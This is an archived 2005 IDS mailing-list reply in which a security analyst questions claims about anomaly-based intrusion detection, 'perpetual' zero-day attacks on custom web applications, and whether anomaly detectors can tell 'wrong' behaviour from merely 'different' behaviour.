IDS mailing list archives
RE: Specification-based Anomaly Detection
From: "Kohlenberg, Toby" <toby.kohlenberg () intel com>
Date: Mon, 10 Jan 2005 22:48:11 -0800
All opinions are my own and in no way reflect the views of my employer. I was going to stay out of this rendition of this debate but...
-----Original Message----- From: Ofer Shezaf [mailto:Ofer.Shezaf () breach com] Sent: Sunday, January 09, 2005 3:53 PM To: Stefano Zanero; roberto.perdisci () gmail com Cc: focus-ids () lists securityfocus com Subject: RE: Specification-based Anomaly Detection Hi Thomas & Stefano, I agree that anomaly detection is a new-comer to IDS, and in many cases not a mature technology. But I think that due to the inherent shortcomings of signatures, it has to be considered seriously.
What exactly is your definition of "new-comer"? Seeing as anomaly detection has been discussed and studied for at least 15 years as far I know...
As one of you mentioned, the main disadvantage of signatures is zero day attacks. As I see it, the significance of zero day attacks is way underrated. Zero day attacks usually refer to abusing of vulnerabilities before a patch or a signature has been issued, but there are those "perpetual" zero day attacks - the bugs in the software of a specific web site. The recent "phpInclude" worm is a very good example of exploitation of such "perpetual" zero day attacks. The worm itself can be detected by signatures as, being a publicly available code, it includes some repeating patterns. On the other hand the same the same techniques can be (and probably are) used by "none worm" crawlers or even manually to attack specific sites, and are not be detected by signatures.
I'm not sure I follow the argument about "perpetual zero day". It sounds like a problem of poor signature writing. Could you expand a little more on why this is a problem for signature-based approaches as opposed to anomaly-based approaches?
2. On the network layer, network profiling analyzes the normal behavior of users (i.e traffic), while in the application layer we also profile the normal behavior of the application. Saying that, anomaly itself usually identifies that something is wrong but not what is wrong. We use two important additional mechanisms to derive actionable information:
What is your basis for saying that anomaly detection usually detects that something is wrong? I've never seen an anomaly detection system that detects things that are "wrong", by definition they only detect that something is _different_. The assumption that that is always something wrong is one of the basic problems with how people implement anomaly-based solutions in my opinion. toby Toby Kohlenberg, CISSP, GCIH, GCIA Senior Information Security Analyst Applied Security Technology Team Intel Corporate Information Security 503-712-8588 Office & Voicemail 877-497-1696 Pager "Just because you're paranoid, doesn't mean they're not after you." PGP Fingerprint: 92E2 E2FC BB8B 98CD 88FA 01A1 6E09 B5BA 9E84 9E70 -------------------------------------------------------------------------- Test Your IDS Is your IDS deployed correctly? Find out quickly and easily by testing it with real-world attacks from CORE IMPACT. Go to http://www.securityfocus.com/sponsor/CoreSecurity_focus-ids_040708 to learn more. --------------------------------------------------------------------------
Current thread:
- Specification-based Anomaly Detection Roberto Perdisci (Jan 03)
- Re: Specification-based Anomaly Detection Ravi Kumar (Jan 04)
- Re: Specification-based Anomaly Detection Thomas Ptacek (Jan 06)
- Re: Specification-based Anomaly Detection Stefano Zanero (Jan 08)
- <Possible follow-ups>
- RE: Specification-based Anomaly Detection Ofer Shezaf (Jan 10)
- Re: Specification-based Anomaly Detection Stefano Zanero (Jan 10)
- Re: Specification-based Anomaly Detection David Barroso (Jan 12)
- Re: Specification-based Anomaly Detection Stefano Zanero (Jan 10)
- RE: Specification-based Anomaly Detection Kohlenberg, Toby (Jan 12)
- RE: Specification-based Anomaly Detection Kohlenberg, Toby (Jan 12)
- Re: Specification-based Anomaly Detection Stefano Zanero (Jan 12)
- RE: Specification-based Anomaly Detection Kohlenberg, Toby (Jan 17)
- Re: Specification-based Anomaly Detection Stefano Zanero (Jan 17)
- Re: Specification-based Anomaly Detection Stefano Zanero (Jan 23)
- RE: Specification-based Anomaly Detection Ofer Shezaf (Jan 17)
- RE: Specification-based Anomaly Detection Ofer Shezaf (Jan 17)
- Re: Specification-based Anomaly Detection Stefano Zanero (Jan 17)
- RE: Specification-based Anomaly Detection Kohlenberg, Toby (Jan 17)
- RE: Specification-based Anomaly Detection (infor) urko zurutuza (Jan 19)
(Thread continues...)